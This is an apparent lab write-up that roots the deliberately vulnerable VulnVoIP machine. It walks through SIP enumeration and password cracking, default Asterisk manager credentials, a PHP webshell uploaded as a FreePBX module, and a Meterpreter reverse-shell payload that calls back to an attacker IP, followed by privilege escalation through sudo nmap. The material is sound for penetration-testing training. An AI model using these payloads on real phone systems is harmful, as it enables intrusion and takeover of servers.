VulnVoIP (Vulnerable VoIP) Solutions

As promised here we shall discuss a couple of ways to get root on VulnVoIP with some enumeration ‘fun’ in-between!

Assuming you’ve located the IP address, you can run a port scan and will find the following services listening (shortened for easy reference):

• 22/tcp open
• 53/tcp open domain
• 80/tcp open http
• 111/tcp open rpcbind
• 967/tcp open
• 3306/tcp open mysql
• 4445/tcp open
• 5038/tcp open asterisk

VoIP User Enumeration

In this demonstration I’m using SIPVicious to enumerate the SIP device/users and to help crack extension passwords.

The first thing to do is enumerate the end device. To do so we can use the command ./svmap.py –fingerprint 192.168.237.148

The next step is to locate valid SIP extensions. The initial command I used was ./svwar.py -D 192.168.237.148

As you can see no valid extensions are returned.

It’s possible to specify the method used in the request. In this particular instance the INVITE request brings back valid responses ./svwar.py -D -m INVITE 192.168.237.148

If all went well you should find that 6 extensions exist. The –D option used in the previous command just searches for default extensions, so it’s generally best to use a custom range. I also found that if I specified the extensions to scan, i.e. –e100-3000, only the lower extensions were found, hence it may be best to split up long scans.

Now that we’ve located extensions we really want to crack the associated passwords. Again SIPVicious can be used to perform this attack by using a command such as ./svcrack.py -u2000 -d passwords.txt 192.168.237.148

You might find that some extensions are easy to crack, others are a bit more testing! In this particular case, luckily, we have another unusual method of obtaining extension passwords.

Referring back to the port scan you can see that TCP port 5038 (Asterisk Call Manager) is open and available to external probes! If you performed a vulnerability scan this may have shown up stating that default credentials are in place.

It is possible to connect to the service using the telnet protocol on port 5038 with the default username admin and password amp111.

Using the command action with the actual command of sip show users it is possible to pull out a complete list of users, shown below:

The acm interface can also be used to locate voicemail users (useful for the next exercise!)

Note the ‘interesting’ information highlighted in the above image.

A thorough list of acm commands can be found here

Further Exploitation

As we’ve located a single user with voicemail capability, and we have the extension password, it is possible to use a soft-phone to log in with the credentials and attempt to gain access to the users voicemail inbox. For this particular example I’m using X-Lite.

Referencing Asterisk documentation it’s possible to see that *97 can be used to obtain voicemail. As we don’t know the voicemail password we’re going to have to bruteforce the manual way! Hint 0000 may get you in… In case you’re still struggling the voicemail goes along the lines of the following:

‘…Hey Mark, I think the support web access account has been compromised. I have changed the password to securesupport123 all one word and lowercase. You can log on at the usual address. See you in the morning…’

After listening to the voicemail you should now have the username and password for the support account. To test these out navigate to the HTTP interface and enter the credentials support/securesupport123

Upon login you’ll be presented with the main administrative interface. A key piece of info is found in the FreePBX version details (research for vulnerabilities).

One particular vulnerability of interest can be found here, of which an extract follows:

1. Create a directory such as: webshell
2. Create a PHP file webshell, i.e. webshell.php
   • Example.: <? if($_GET[‘cmd’]) { system($_GET[‘cmd’]); }?>
3. Put this file into the webshell directory and create a tarball.
   • This compressed file name needs to follow the given rule, i.e. name-version.tgz.
   • The following command can be used to compress: tar -czvf webshell-1.0.tgz webshell/.
4. Upload via the FreePBX modules interface

Using the webshell to perform a basic command (to ensure all is working as expected).

I used msfpayload to create a reverse shell for ease of access.

msfpayload linux/x86/meterpreter/reverse_tcp LHOST=192.168.237.129 LPORT=4448 X > /root/vulnvoip/rev_shell.

The handler (exploit/multi/handler) was used to listen and wait for incoming connections.

TFTP can be used to upload the binary to the host using the PHP webshell as previously created, by using the command tftp *HOST_IP*-c get rev_shell.

Permissions of the uploaded file will need to be altered, i.e. chmod 777 rev_shell – not a great idea to use lax permissions like these in real life 😉

Upon gaining access via the Meterpreter shell it makes things easier (continue reading)…

Local Privilege Escalation

The usual tips and tricks work here. A little surprise is hidden in the sudoers file. Firstly we’ll need to locate the current user by issuing the command id which will show the user is asterisk. Issuing the command sudo -l will then identify the commands that asterisk can run as root.

The user asterisk can surprisingly run nmap as root! There’s a little trick here…

We’ve got root!

Exploitation – The Easy Way!

The following was covered in detail by Offensive Security and the write-up can be found here.

The version of FreePBX in use is vulnerable to an arbitrary remote code execution issue. Further details can be found at exploitDB and Securityfocus.

From the reported details it is possible to see that a Metasploit module exists, this being exploit/unix/http/freepbx_callmenum.

Set the relevant options (note, the extension we use for this either has to go to voicemail or the call needs to be answered). For this exploit we’re going to use the support extension. We’ll assume that we haven’t yet cracked user credentials to any extensions and, this being the only one with voicemail, leaves us with just one choice.

Exploit!

We have root shell. Now how cool and easy was that!

There are a few more funky things we can do with VulnVoIP, such as SIP spoofing. However we’ll cover that in a separate post and in the meantime have some fun!